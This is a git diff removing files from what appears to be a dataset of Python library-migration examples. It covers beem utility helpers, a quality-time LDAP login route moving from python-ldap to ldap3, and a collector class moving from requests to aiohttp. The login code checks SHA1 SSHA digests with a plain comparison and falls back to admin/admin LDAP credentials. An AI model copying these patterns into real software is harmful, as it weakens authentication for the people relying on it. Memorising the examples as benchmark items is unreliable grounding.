Graphene (`%Y-%m-%dT%H:%M:%S`) - :rtype: str - - """ - return datetime.utcfromtimestamp(timenow.time() + int(secs)).strftime(timeFormat) - - -def formatTimedelta(td): - """Format timedelta to String - """ - if not isinstance(td, timedelta): - return "" - days, seconds = td.days, td.seconds - hours = days * 24 + seconds // 3600 - minutes = (seconds % 3600) // 60 - seconds = seconds % 60 - return "%d:%s:%s" % (hours, str(minutes).zfill(2), str(seconds).zfill(2)) - - -def parse_time(block_time): - """Take a string representation of time from the blockchain, and parse it - into datetime object. - """ - utc = pytz.timezone("UTC") - return utc.localize(datetime.strptime(block_time, timeFormat)) - - -def assets_from_string(text): - """Correctly split a string containing an asset pair. - - Splits the string into two assets with the separator being on of the - following: ``:``, ``/``, or ``-``. - """ - return re.split(r"[\-:\/]", text) - - -def sanitize_permlink(permlink): - permlink = permlink.strip() - permlink = re.sub(r"_|\s|\.", "-", permlink) - permlink = re.sub(r"[^\w-]", "", permlink) - permlink = re.sub(r"[^a-zA-Z0-9-]", "", permlink) - permlink = permlink.lower() - return permlink - - -def derive_permlink(title, parent_permlink=None, parent_author=None, - max_permlink_length=256, with_suffix=True): - """Derive a permlink from a comment title (for root level - comments) or the parent permlink and optionally the parent - author (for replies). - - """ - suffix = "-" + formatTime(datetime.utcnow()) + "z" - if parent_permlink and parent_author: - prefix = "re-" + sanitize_permlink(parent_author) + "-" - if with_suffix: - rem_chars = max_permlink_length - len(suffix) - len(prefix) - else: - rem_chars = max_permlink_length - len(prefix) - body = sanitize_permlink(parent_permlink)[:rem_chars] - if with_suffix: - return prefix + body + suffix - else: - return prefix + body - elif parent_permlink: - prefix = "re-" - if with_suffix: - rem_chars = max_permlink_length - len(suffix) - len(prefix) - else: - rem_chars = max_permlink_length - len(prefix) - body = sanitize_permlink(parent_permlink)[:rem_chars] - if with_suffix: - return prefix + body + suffix - else: - return prefix + body - else: - if with_suffix: - rem_chars = max_permlink_length - len(suffix) - else: - rem_chars = max_permlink_length - body = sanitize_permlink(title)[:rem_chars] - if len(body) == 0: # empty title or title consisted of only special chars - return suffix[1:] # use timestamp only, strip leading "-" - if with_suffix: - return body + suffix - else: - return body - - -def resolve_authorperm(identifier): - """Correctly split a string containing an authorperm. - - Splits the string into author and permlink with the - following separator: ``/``. - - Examples: - - .. code-block:: python - - >>> from beem.utils import resolve_authorperm - >>> author, permlink = resolve_authorperm('https://d.tube/#!/v/pottlund/m5cqkd1a') - >>> author, permlink = resolve_authorperm("https://steemit.com/witness-category/@gtg/24lfrm-gtg-witness-log") - >>> author, permlink = resolve_authorperm("@gtg/24lfrm-gtg-witness-log") - >>> author, permlink = resolve_authorperm("https://busy.org/@gtg/24lfrm-gtg-witness-log") - - """ - # without any http(s) - match = re.match(r"@?([\w\-\.]*)/([\w\-]*)", identifier) - if hasattr(match, "group"): - return match.group(1), match.group(2) - # dtube url - match = re.match(r"([\w\-\.]+[^#?\s]+)/#!/v/?([\w\-\.]*)/([\w\-]*)", identifier) - if hasattr(match, "group"): - return match.group(2), match.group(3) - # url - match = re.match(r"([\w\-\.]+[^#?\s]+)/@?([\w\-\.]*)/([\w\-]*)", identifier) - if not hasattr(match, "group"): - raise ValueError("Invalid identifier") - return match.group(2), match.group(3) - - -def construct_authorperm(*args): - """ Create a post identifier from comment/post object or arguments. - Examples: - - .. code-block:: python - - >>> from beem.utils import construct_authorperm - >>> print(construct_authorperm('username', 'permlink')) - @username/permlink - >>> print(construct_authorperm({'author': 'username', 'permlink': 'permlink'})) - @username/permlink - - """ - username_prefix = "@" - if len(args) == 1: - op = args[0] - author, permlink = op["author"], op["permlink"] - elif len(args) == 2: - author, permlink = args - else: - raise ValueError("construct_identifier() received unparsable arguments") - - fields = dict(prefix=username_prefix, author=author, permlink=permlink) - return "{prefix}{author}/{permlink}".format(**fields) - - -def resolve_root_identifier(url): - m = re.match(r"/([^/]*)/@([^/]*)/([^#]*).*", url) - if not m: - return "", "" - else: - category = m.group(1) - author = m.group(2) - permlink = m.group(3) - return construct_authorperm(author, permlink), category - - -def resolve_authorpermvoter(identifier): - """Correctly split a string containing an authorpermvoter. - - Splits the string into author and permlink with the - following separator: ``/`` and ``|``. - """ - pos = identifier.find("|") - if pos < 0: - raise ValueError("Invalid identifier") - [author, permlink] = resolve_authorperm(identifier[:pos]) - return author, permlink, identifier[pos + 1 :] - - -def construct_authorpermvoter(*args): - """ Create a vote identifier from vote object or arguments. - Examples: - - .. code-block:: python - - >>> from beem.utils import construct_authorpermvoter - >>> print(construct_authorpermvoter('username', 'permlink', 'voter')) - @username/permlink|voter - >>> print(construct_authorpermvoter({'author': 'username', 'permlink': 'permlink', 'voter': 'voter'})) - @username/permlink|voter - - """ - username_prefix = "@" - if len(args) == 1: - op = args[0] - if "authorperm" in op: - authorperm, voter = op["authorperm"], op["voter"] - [author, permlink] = resolve_authorperm(authorperm) - else: - author, permlink, voter = op["author"], op["permlink"], op["voter"] - elif len(args) == 2: - authorperm, voter = args - [author, permlink] = resolve_authorperm(authorperm) - elif len(args) == 3: - author, permlink, voter = args - else: - raise ValueError("construct_identifier() received unparsable arguments") - - fields = dict(prefix=username_prefix, author=author, permlink=permlink, voter=voter) - return "{prefix}{author}/{permlink}|{voter}".format(**fields) - - -def reputation_to_score(rep): - """Converts the account reputation value into the reputation score""" - if isinstance(rep, str): - rep = int(rep) - if rep == 0: - return 25.0 - score = max([math.log10(abs(rep)) - 9, 0]) - if rep < 0: - score *= -1 - score = (score * 9.0) + 25.0 - return score - - -def remove_from_dict(obj, keys=list(), keep_keys=True): - """ Prune a class or dictionary of all but keys (keep_keys=True). - Prune a class or dictionary of specified keys.(keep_keys=False). - """ - if type(obj) == dict: - items = list(obj.items()) - elif isinstance(obj, dict): - items = list(obj.items()) - else: - items = list(obj.__dict__.items()) - if keep_keys: - return {k: v for k, v in items if k in keys} - else: - return {k: v for k, v in items if k not in keys} - - -def make_patch(a, b, n=3): - # _no_eol = '\n' + "\ No newline at end of file" + '\n' - _no_eol = "\n" - diffs = difflib.unified_diff(a.splitlines(True), b.splitlines(True), n=n) - try: - _, _ = next(diffs), next(diffs) - del _ - except StopIteration: - pass - return "".join([d if d[-1] == "\n" else d + _no_eol for d in diffs]) - - -def findall_patch_hunks(body=None): - return RE_HUNK_HEADER.findall(body) - - -def derive_beneficiaries(beneficiaries): - beneficiaries_list = [] - beneficiaries_accounts = [] - beneficiaries_sum = 0 - if not isinstance(beneficiaries, list): - beneficiaries = beneficiaries.split(",") - - for w in beneficiaries: - account_name = w.strip().split(":")[0] - if account_name[0] == "@": - account_name = account_name[1:] - if account_name in beneficiaries_accounts: - continue - if w.find(":") == -1: - percentage = -1 - else: - percentage = w.strip().split(":")[1] - if "%" in percentage: - percentage = percentage.strip().split("%")[0].strip() - percentage = float(percentage) - beneficiaries_sum += percentage - beneficiaries_list.append( - {"account": account_name, "weight": int(percentage * 100)} - ) - beneficiaries_accounts.append(account_name) - - missing = 0 - for bene in beneficiaries_list: - if bene["weight"] < 0: - missing += 1 - index = 0 - for bene in beneficiaries_list: - if bene["weight"] < 0: - beneficiaries_list[index]["weight"] = int( - (int(100 * 100) - int(beneficiaries_sum * 100)) / missing - ) - index += 1 - sorted_beneficiaries = sorted( - beneficiaries_list, key=lambda beneficiaries_list: beneficiaries_list["account"] - ) - return sorted_beneficiaries - - -def derive_tags(tags): - tags_list = [] - if len(tags.split(",")) > 1: - for tag in tags.split(","): - tags_list.append(tag.strip()) - elif len(tags.split(" ")) > 1: - for tag in tags.split(" "): - tags_list.append(tag.strip()) - elif len(tags) > 0: - tags_list.append(tags.strip()) - return tags_list - - -def seperate_yaml_dict_from_body(content): - parameter = {} - body = "" - if len(content.split("---\n")) > 1: - body = content[content.find("---\n", 1) + 4 :] - yaml_content = content[content.find("---\n") + 4 : content.find("---\n", 1)] - yaml=YAML(typ="safe") - parameter = yaml.load(yaml_content) - if not isinstance(parameter, dict): - parameter = yaml.load(yaml_content.replace(":", ": ").replace(" ", " ")) - else: - body = content - return body, parameter - - -def load_dirty_json(dirty_json): - regex_replace = [(r"([ \{,:\[])(u)?'([^']+)'", r'\1"\3"'), (r" False([, \}\]])", r' false\1'), (r" True([, \}\]])", r' true\1')] - for r, s in regex_replace: - dirty_json = re.sub(r, s, dirty_json) - clean_json = json.loads(dirty_json) - return clean_json diff --git a/v1/data/codefile/ictu@quality-time__cc47b42__components$server$src$routes$auth.py.diff b/v1/data/codefile/ictu@quality-time__cc47b42__components$server$src$routes$auth.py.diff deleted file mode 100644 index 76f33ce..0000000 --- a/v1/data/codefile/ictu@quality-time__cc47b42__components$server$src$routes$auth.py.diff +++ /dev/null @@ -1,95 +0,0 @@ -diff --git a/components/server/src/routes/auth.py b/components/server/src/routes/auth.py - index 23a4525b4f703b39a097fc8f4e3a7846aa7e1e72..cc47b42cf70b6968b22a3819bf0b9714135271c1 100644 - --- a/components/server/src/routes/auth.py - +++ b/components/server/src/routes/auth.py -@@ -6,14 +6,16 @@ import os - import re - from typing import cast, Dict, Tuple - import urllib.parse -+import hashlib -+import base64 - - from pymongo.database import Database --import ldap --import bottle -+from ldap3 import Server, Connection, ALL -+from ldap3.core import exceptions - -+import bottle - from database import sessions - from utilities.functions import uuid --from utilities.ldap import LDAPObject - from utilities.type import SessionId - - -@@ -31,12 +33,27 @@ def set_session_cookie(session_id: str, expires_datetime: datetime) -> None: - options["domain"] = domain - bottle.response.set_cookie("session_id", session_id, **options) - -+def check_password(ssha_ldap_salted_password, password): -+ """Checks the OpenLDAP tagged digest against the given password""" -+ -+ if ssha_ldap_salted_password[:6] != b'{SSHA}': -+ logging.warning("Only SSHA LDAP password digest supported!") -+ raise exceptions.LDAPInvalidAttributeSyntaxResult -+ -+ digest_salt_b64 = ssha_ldap_salted_password[6:] # strip {SSHA} -+ -+ digest_salt = base64.b64decode(digest_salt_b64) -+ digest = digest_salt[:20] -+ salt = digest_salt[20:] -+ -+ sha = hashlib.sha1(bytes(password, 'utf-8')) #nosec -+ sha.update(salt) #nosec -+ -+ return digest == sha.digest() - - @bottle.post("/login") - def login(database: Database) -> Dict[str, bool]: - """Log the user in.""" -- # Pylint can't find the ldap.* constants for some reason, turn off the error message: -- # pylint: disable=no-member - credentials = dict(bottle.request.json) - unsafe_characters = re.compile(r"[^\w ]+", re.UNICODE) - username = re.sub(unsafe_characters, "", credentials.get("username", "no username given")) -@@ -44,23 +61,25 @@ def login(database: Database) -> Dict[str, bool]: - ldap_url = os.environ.get("LDAP_URL", "ldap://localhost:389") - ldap_lookup_user = os.environ.get("LDAP_LOOKUP_USER", "admin") - ldap_lookup_user_password = os.environ.get("LDAP_LOOKUP_USER_PASSWORD", "admin") -- ldap_server = ldap.initialize(ldap_url) -+ - try: -- ldap_server.simple_bind_s(f"cn={ldap_lookup_user},{ldap_root_dn}", ldap_lookup_user_password) -- result = ldap_server.search_s( -- ldap_root_dn, ldap.SCOPE_SUBTREE, f"(|(uid={username})(cn={username}))", ['dn', 'uid', 'cn']) -- if result: -- logging.info("LDAP search result: %s", result) -- username = LDAPObject(result[0][1]).cn -- else: -- raise ldap.INVALID_CREDENTIALS -- ldap_server.simple_bind_s(f"cn={username},{ldap_root_dn}", credentials.get("password")) -- except (ldap.INVALID_CREDENTIALS, ldap.UNWILLING_TO_PERFORM, ldap.INVALID_DN_SYNTAX, -- ldap.SERVER_DOWN) as reason: -- logging.warning("Couldn't bind cn=%s,%s: %s", username, ldap_root_dn, reason) -+ ldap_server = Server(ldap_url, get_info=ALL) -+ with Connection(ldap_server, -+ user=f"cn={ldap_lookup_user},{ldap_root_dn}", password=ldap_lookup_user_password) as conn: -+ if not conn.bind(): -+ username = ldap_lookup_user -+ raise exceptions.LDAPBindError -+ -+ conn.search(ldap_root_dn, f"(|(uid={username})(cn={username}))", attributes=['userPassword']) -+ result = conn.entries[0] -+ password = credentials.get("password", "no password given") -+ if not check_password(result.userPassword.value, password): -+ return dict(ok=False) -+ -+ except Exception as reason: # pylint: disable=broad-except -+ logging.warning("LDAP error for cn=%s,%s: %s", username, ldap_root_dn, reason) - return dict(ok=False) -- finally: -- ldap_server.unbind_s() -+ - session_id, session_expiration_datetime = generate_session() - sessions.upsert(database, username, session_id, session_expiration_datetime) - set_session_cookie(session_id, session_expiration_datetime) diff --git a/v1/data/codefile/ictu@quality-time__cc47b42__components$server$src$routes$auth.py.source.py b/v1/data/codefile/ictu@quality-time__cc47b42__components$server$src$routes$auth.py.source.py deleted file mode 100644 index 4645ceb..0000000 --- a/v1/data/codefile/ictu@quality-time__cc47b42__components$server$src$routes$auth.py.source.py +++ /dev/null @@ -1,76 +0,0 @@ -"""Login/logout.""" - -from datetime import datetime, timedelta -import logging -import os -import re -from typing import cast, Dict, Tuple -import urllib.parse - -from pymongo.database import Database -import ldap -import bottle - -from database import sessions -from utilities.functions import uuid -from utilities.ldap import LDAPObject -from utilities.type import SessionId - - -def generate_session() -> Tuple[SessionId, datetime]: - """Generate a new random, secret and unique session id and a session expiration datetime.""" - return cast(SessionId, uuid()), datetime.now() + timedelta(hours=24) - - -def set_session_cookie(session_id: str, expires_datetime: datetime) -> None: - """Set the session cookie on the response. To clear the cookie, pass an expiration datetime of datetime.min.""" - options = dict(expires=expires_datetime, path="/", httponly=True) - server_url = os.environ.get("SERVER_URL", "http://localhost:5001") - domain = urllib.parse.urlparse(server_url).netloc.split(":")[0] - if domain != "localhost": - options["domain"] = domain - bottle.response.set_cookie("session_id", session_id, **options) - - -@bottle.post("/login") -def login(database: Database) -> Dict[str, bool]: - """Log the user in.""" - # Pylint can't find the ldap.* constants for some reason, turn off the error message: - # pylint: disable=no-member - credentials = dict(bottle.request.json) - unsafe_characters = re.compile(r"[^\w ]+", re.UNICODE) - username = re.sub(unsafe_characters, "", credentials.get("username", "no username given")) - ldap_root_dn = os.environ.get("LDAP_ROOT_DN", "dc=example,dc=org") - ldap_url = os.environ.get("LDAP_URL", "ldap://localhost:389") - ldap_lookup_user = os.environ.get("LDAP_LOOKUP_USER", "admin") - ldap_lookup_user_password = os.environ.get("LDAP_LOOKUP_USER_PASSWORD", "admin") - ldap_server = ldap.initialize(ldap_url) - try: - ldap_server.simple_bind_s(f"cn={ldap_lookup_user},{ldap_root_dn}", ldap_lookup_user_password) - result = ldap_server.search_s( - ldap_root_dn, ldap.SCOPE_SUBTREE, f"(|(uid={username})(cn={username}))", ['dn', 'uid', 'cn']) - if result: - logging.info("LDAP search result: %s", result) - username = LDAPObject(result[0][1]).cn - else: - raise ldap.INVALID_CREDENTIALS - ldap_server.simple_bind_s(f"cn={username},{ldap_root_dn}", credentials.get("password")) - except (ldap.INVALID_CREDENTIALS, ldap.UNWILLING_TO_PERFORM, ldap.INVALID_DN_SYNTAX, - ldap.SERVER_DOWN) as reason: - logging.warning("Couldn't bind cn=%s,%s: %s", username, ldap_root_dn, reason) - return dict(ok=False) - finally: - ldap_server.unbind_s() - session_id, session_expiration_datetime = generate_session() - sessions.upsert(database, username, session_id, session_expiration_datetime) - set_session_cookie(session_id, session_expiration_datetime) - return dict(ok=True) - - -@bottle.post("/logout") -def logout(database: Database) -> Dict[str, bool]: - """Log the user out.""" - session_id = cast(SessionId, str(bottle.request.get_cookie("session_id"))) - sessions.delete(database, session_id) - set_session_cookie(session_id, datetime.min) - return dict(ok=True) diff --git a/v1/data/codefile/ictu@quality-time__cc47b42__components$server$src$routes$auth.py.target.py b/v1/data/codefile/ictu@quality-time__cc47b42__components$server$src$routes$auth.py.target.py deleted file mode 100644 index e8859c9..0000000 --- a/v1/data/codefile/ictu@quality-time__cc47b42__components$server$src$routes$auth.py.target.py +++ /dev/null @@ -1,95 +0,0 @@ -"""Login/logout.""" - -from datetime import datetime, timedelta -import logging -import os -import re -from typing import cast, Dict, Tuple -import urllib.parse -import hashlib -import base64 - -from pymongo.database import Database -from ldap3 import Server, Connection, ALL -from ldap3.core import exceptions - -import bottle -from database import sessions -from utilities.functions import uuid -from utilities.type import SessionId - - -def generate_session() -> Tuple[SessionId, datetime]: - """Generate a new random, secret and unique session id and a session expiration datetime.""" - return cast(SessionId, uuid()), datetime.now() + timedelta(hours=24) - - -def set_session_cookie(session_id: str, expires_datetime: datetime) -> None: - """Set the session cookie on the response. To clear the cookie, pass an expiration datetime of datetime.min.""" - options = dict(expires=expires_datetime, path="/", httponly=True) - server_url = os.environ.get("SERVER_URL", "http://localhost:5001") - domain = urllib.parse.urlparse(server_url).netloc.split(":")[0] - if domain != "localhost": - options["domain"] = domain - bottle.response.set_cookie("session_id", session_id, **options) - -def check_password(ssha_ldap_salted_password, password): - """Checks the OpenLDAP tagged digest against the given password""" - - if ssha_ldap_salted_password[:6] != b'{SSHA}': - logging.warning("Only SSHA LDAP password digest supported!") - raise exceptions.LDAPInvalidAttributeSyntaxResult - - digest_salt_b64 = ssha_ldap_salted_password[6:] # strip {SSHA} - - digest_salt = base64.b64decode(digest_salt_b64) - digest = digest_salt[:20] - salt = digest_salt[20:] - - sha = hashlib.sha1(bytes(password, 'utf-8')) #nosec - sha.update(salt) #nosec - - return digest == sha.digest() - -@bottle.post("/login") -def login(database: Database) -> Dict[str, bool]: - """Log the user in.""" - credentials = dict(bottle.request.json) - unsafe_characters = re.compile(r"[^\w ]+", re.UNICODE) - username = re.sub(unsafe_characters, "", credentials.get("username", "no username given")) - ldap_root_dn = os.environ.get("LDAP_ROOT_DN", "dc=example,dc=org") - ldap_url = os.environ.get("LDAP_URL", "ldap://localhost:389") - ldap_lookup_user = os.environ.get("LDAP_LOOKUP_USER", "admin") - ldap_lookup_user_password = os.environ.get("LDAP_LOOKUP_USER_PASSWORD", "admin") - - try: - ldap_server = Server(ldap_url, get_info=ALL) - with Connection(ldap_server, - user=f"cn={ldap_lookup_user},{ldap_root_dn}", password=ldap_lookup_user_password) as conn: - if not conn.bind(): - username = ldap_lookup_user - raise exceptions.LDAPBindError - - conn.search(ldap_root_dn, f"(|(uid={username})(cn={username}))", attributes=['userPassword']) - result = conn.entries[0] - password = credentials.get("password", "no password given") - if not check_password(result.userPassword.value, password): - return dict(ok=False) - - except Exception as reason: # pylint: disable=broad-except - logging.warning("LDAP error for cn=%s,%s: %s", username, ldap_root_dn, reason) - return dict(ok=False) - - session_id, session_expiration_datetime = generate_session() - sessions.upsert(database, username, session_id, session_expiration_datetime) - set_session_cookie(session_id, session_expiration_datetime) - return dict(ok=True) - - -@bottle.post("/logout") -def logout(database: Database) -> Dict[str, bool]: - """Log the user out.""" - session_id = cast(SessionId, str(bottle.request.get_cookie("session_id"))) - sessions.delete(database, session_id) - set_session_cookie(session_id, datetime.min) - return dict(ok=True) diff --git a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$base_collectors$source_collector.py.diff b/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$base_collectors$source_collector.py.diff deleted file mode 100644 index 75ede7b..0000000 --- a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$base_collectors$source_collector.py.diff +++ /dev/null @@ -1,281 +0,0 @@ -diff --git a/components/collector/src/source_collectors/source_collector.py b/components/collector/src/base_collectors/source_collector.py - index 6df08864df270b6956cc78502aa3d9c0446038d5..d3a9a16a72348cece48c9788cf10db6cc043ec7c 100644 - --- a/components/collector/src/source_collectors/source_collector.py - +++ b/components/collector/src/base_collectors/source_collector.py -@@ -1,32 +1,32 @@ - """Source collector base classes.""" - --import io -+import asyncio -+import json - import logging - import traceback - import urllib --import zipfile - from abc import ABC, abstractmethod - from datetime import datetime - from http import HTTPStatus --from typing import cast, Dict, Final, List, Optional, Set, Tuple, Type, Union -+from typing import cast, Any, Dict, Final, List, Optional, Set, Tuple, Type, Union - --import requests -+import aiohttp - - from collector_utilities.functions import days_ago, tokenless, stable_traceback --from collector_utilities.type import ErrorMessage, Entities, Measurement, Response, Responses, URL, Value -+from collector_utilities.type import ErrorMessage, Entities, JSON, Measurement, Response, Responses, URL, Value - - - class SourceCollector(ABC): - """Base class for source collectors. Source collectors are subclasses of this class that know how to collect the - measurement data for one specific metric from one specific source.""" - -- TIMEOUT = 10 # Default timeout of 10 seconds - MAX_ENTITIES = 100 # The maximum number of entities (e.g. violations, warnings) to send to the server - API_URL_PARAMETER_KEY = "url" - source_type = "" # The source type is set on the subclass, when the subclass is registered - subclasses: Set[Type["SourceCollector"]] = set() - -- def __init__(self, source, datamodel) -> None: -+ def __init__(self, session: aiohttp.ClientSession, source, datamodel) -> None: -+ self._session = session - self._datamodel: Final = datamodel - self.__parameters: Final[Dict[str, Union[str, List[str]]]] = source.get("parameters", {}) - -@@ -45,30 +45,22 @@ class SourceCollector(ABC): - return matching_subclasses[0] - raise LookupError(f"Couldn't find collector subclass for source {source_type} and metric {metric_type}") - -- def get(self) -> Measurement: -+ async def get(self) -> Measurement: - """Return the measurement from this source.""" -- responses, api_url, connection_error = self.__safely_get_source_responses() -- value, total, entities, parse_error = self.__safely_parse_source_responses(responses) -- landing_url = self._landing_url(responses) -+ responses, api_url, connection_error = await self.__safely_get_source_responses() -+ value, total, entities, parse_error = await self.__safely_parse_source_responses(responses) -+ landing_url = await self.__safely_parse_landing_url(responses) - return dict(api_url=api_url, landing_url=landing_url, value=value, total=total, entities=entities, - connection_error=connection_error, parse_error=parse_error) - -- def _landing_url(self, responses: Responses) -> URL: # pylint: disable=unused-argument -- """Return the user supplied landing url parameter if there is one, otherwise translate the url parameter into -- a default landing url.""" -- if landing_url := cast(str, self.__parameters.get("landing_url", "")).rstrip("/"): -- return URL(landing_url) -- url = cast(str, self.__parameters.get(self.API_URL_PARAMETER_KEY, "")).rstrip("/") -- return URL(url[:-(len("xml"))] + "html" if url.endswith(".xml") else url) -- -- def _api_url(self) -> URL: -+ async def _api_url(self) -> URL: - """Translate the url parameter into the API url.""" - return URL(cast(str, self.__parameters.get(self.API_URL_PARAMETER_KEY, "")).rstrip("/")) - - def _parameter(self, parameter_key: str, quote: bool = False) -> Union[str, List[str]]: - """Return the parameter value.""" - -- def quote_if_needed(parameter_value): -+ def quote_if_needed(parameter_value: str) -> str: - """Quote the string if needed.""" - return urllib.parse.quote(parameter_value, safe="") if quote else parameter_value - -@@ -84,30 +76,30 @@ class SourceCollector(ABC): - value = cast(str, value).rstrip("/") - return quote_if_needed(value) if isinstance(value, str) else [quote_if_needed(v) for v in value] - -- def __safely_get_source_responses(self) -> Tuple[Responses, URL, ErrorMessage]: -+ async def __safely_get_source_responses(self) -> Tuple[Responses, URL, ErrorMessage]: - """Connect to the source and get the data, without failing. This method should not be overridden - because it makes sure the collection of source data never causes the collector to fail.""" - responses: Responses = [] - api_url = URL("") - error = None - try: -- responses = self._get_source_responses(api_url := self._api_url()) -- for response in responses: -- response.raise_for_status() -+ responses = await self._get_source_responses(api_url := await self._api_url()) - logging.info("Retrieved %s", tokenless(api_url) or self.__class__.__name__) - except Exception as reason: # pylint: disable=broad-except - error = stable_traceback(traceback.format_exc()) - logging.warning("Failed to retrieve %s: %s", tokenless(api_url) or self.__class__.__name__, reason) - return responses, api_url, error - -- def _get_source_responses(self, api_url: URL) -> Responses: -- """Open the url. Can be overridden if a post request is needed or multiple requests need to be made.""" -- return [ -- requests.get(api_url, timeout=self.TIMEOUT, auth=self._basic_auth_credentials(), headers=self._headers())] -- -- def _headers(self) -> Dict[str, str]: # pylint: disable=no-self-use -- """Return the headers for the request.""" -- return dict() -+ async def _get_source_responses(self, *urls: URL) -> Responses: -+ """Open the url. Can be overridden if a post request is needed or serial requests need to be made.""" -+ kwargs: Dict[str, Any] = dict() -+ credentials = self._basic_auth_credentials() -+ if credentials is not None: -+ kwargs["auth"] = aiohttp.BasicAuth(credentials[0], credentials[1]) -+ if headers := self._headers(): -+ kwargs["headers"] = headers -+ tasks = [self._session.get(url, **kwargs) for url in urls] -+ return list(await asyncio.gather(*tasks)) - - def _basic_auth_credentials(self) -> Optional[Tuple[str, str]]: - """Return the basic authentication credentials, if any.""" -@@ -117,7 +109,11 @@ class SourceCollector(ABC): - password = cast(str, self.__parameters.get("password", "")) - return (username, password) if username and password else None - -- def __safely_parse_source_responses( -+ def _headers(self) -> Dict[str, str]: # pylint: disable=no-self-use -+ """Return the headers for the get request.""" -+ return {} -+ -+ async def __safely_parse_source_responses( - self, responses: Responses) -> Tuple[Value, Value, Entities, ErrorMessage]: - """Parse the data from the responses, without failing. This method should not be overridden because it - makes sure that the parsing of source data never causes the collector to fail.""" -@@ -125,95 +121,72 @@ class SourceCollector(ABC): - value, total, error = None, None, None - if responses: - try: -- value, total, entities = self._parse_source_responses(responses) -+ value, total, entities = await self._parse_source_responses(responses) - except Exception: # pylint: disable=broad-except - error = stable_traceback(traceback.format_exc()) - return value, total, entities[:self.MAX_ENTITIES], error - -- def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: -+ async def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - """Parse the responses to get the measurement value, the total value, and the entities for the metric. - This method can be overridden by collectors to parse the retrieved sources data.""" - # pylint: disable=assignment-from-none,no-self-use,unused-argument - return None, "100", [] # pragma nocover - -+ async def __safely_parse_landing_url(self, responses: Responses) -> URL: -+ """Parse the responses to get the landing url, without failing. This method should not be overridden because -+ it makes sure that the parsing of source data never causes the collector to fail.""" -+ try: -+ return await self._landing_url(responses) -+ except Exception: # pylint: disable=broad-except -+ return await self._api_url() - --class FileSourceCollector(SourceCollector, ABC): # pylint: disable=abstract-method -- """Base class for source collectors that retrieve files.""" -- -- file_extensions: List[str] = [] # Subclass responsibility -- -- def _get_source_responses(self, api_url: URL) -> Responses: -- responses = super()._get_source_responses(api_url) -- if not api_url.endswith(".zip"): -- return responses -- unzipped_responses = [] -- for response in responses: -- unzipped_responses.extend(self.__unzip(response)) -- return unzipped_responses -- -- def _headers(self) -> Dict[str, str]: -- headers = super()._headers() -- if token := cast(str, self._parameter("private_token")): -- # GitLab needs this header, see -- # https://docs.gitlab.com/ee/api/jobs.html#download-a-single-artifact-file-by-job-id -- headers["Private-Token"] = token -- return headers -- -- @classmethod -- def __unzip(cls, response: Response) -> Responses: -- """Unzip the response content and return a (new) response for each applicable file in the zip archive.""" -- responses = [] -- with zipfile.ZipFile(io.BytesIO(response.content)) as response_zipfile: -- names = [name for name in response_zipfile.namelist() if name.split(".")[-1].lower() in cls.file_extensions] -- for name in names: -- unzipped_response = requests.Response() -- unzipped_response.raw = io.BytesIO(response_zipfile.read(name)) -- unzipped_response.status_code = HTTPStatus.OK -- responses.append(unzipped_response) -- return responses -- -- --class HTMLFileSourceCollector(FileSourceCollector, ABC): # pylint: disable=abstract-method -- """Base class for source collectors that retrieve HTML files.""" -- -- file_extensions = ["html", "htm"] -- -+ async def _landing_url(self, responses: Responses) -> URL: # pylint: disable=unused-argument -+ """Return the user supplied landing url parameter if there is one, otherwise translate the url parameter into -+ a default landing url.""" -+ if landing_url := cast(str, self.__parameters.get("landing_url", "")).rstrip("/"): -+ return URL(landing_url) -+ url = cast(str, self.__parameters.get(self.API_URL_PARAMETER_KEY, "")).rstrip("/") -+ return URL(url[:-(len("xml"))] + "html" if url.endswith(".xml") else url) - --class JSONFileSourceCollector(FileSourceCollector, ABC): # pylint: disable=abstract-method -- """Base class for source collectors that retrieve JSON files.""" - -- file_extensions = ["json"] -+class FakeResponse: # pylint: disable=too-few-public-methods -+ """Fake a response because aiohttp.ClientResponse can not easily be instantiated directly. """ -+ status = HTTPStatus.OK - -+ def __init__(self, contents: bytes = bytes()) -> None: -+ super().__init__() -+ self.contents = contents - --class XMLFileSourceCollector(FileSourceCollector, ABC): # pylint: disable=abstract-method -- """Base class for source collectors that retrieve XML files.""" -+ async def json(self) -> JSON: -+ """Return the JSON version of the contents.""" -+ return cast(JSON, json.loads(self.contents)) - -- file_extensions = ["xml"] -+ async def text(self) -> str: -+ """Return the text version of the contents.""" -+ return str(self.contents.decode()) - - - class LocalSourceCollector(SourceCollector, ABC): # pylint: disable=abstract-method - """Base class for source collectors that do not need to access the network but return static or user-supplied - data.""" - -- def _get_source_responses(self, api_url: URL) -> Responses: -- fake_response = requests.Response() -- fake_response.status_code = HTTPStatus.OK -- return [fake_response] # Return a fake response so that the parse methods will be called -+ async def _get_source_responses(self, *urls: URL) -> Responses: -+ return [cast(Response, FakeResponse())] # Return a fake response so that the parse methods will be called - - - class UnmergedBranchesSourceCollector(SourceCollector, ABC): # pylint: disable=abstract-method - """Base class for unmerged branches source collectors.""" - -- def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: -+ async def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - entities = [ - dict(key=branch["name"], name=branch["name"], commit_age=str(days_ago(self._commit_datetime(branch))), - commit_date=str(self._commit_datetime(branch).date())) -- for branch in self._unmerged_branches(responses)] -+ for branch in await self._unmerged_branches(responses)] - return str(len(entities)), "100", entities - - @abstractmethod -- def _unmerged_branches(self, responses: Responses) -> List: -- """Return the list of unmerged branch.""" -+ async def _unmerged_branches(self, responses: Responses) -> List[Dict[str, Any]]: -+ """Return the list of unmerged branches.""" - - @abstractmethod - def _commit_datetime(self, branch) -> datetime: -@@ -223,9 +196,10 @@ class UnmergedBranchesSourceCollector(SourceCollector, ABC): # pylint: disable= - class SourceUpToDatenessCollector(SourceCollector): - """Base class for source up-to-dateness collectors.""" - -- def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: -- return str(days_ago(min(self._parse_source_response_date_time(response) for response in responses))), "100", [] -+ async def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: -+ date_times = await asyncio.gather(*[self._parse_source_response_date_time(response) for response in responses]) -+ return str(days_ago(min(date_times))), "100", [] - -- def _parse_source_response_date_time(self, response: Response) -> datetime: -+ async def _parse_source_response_date_time(self, 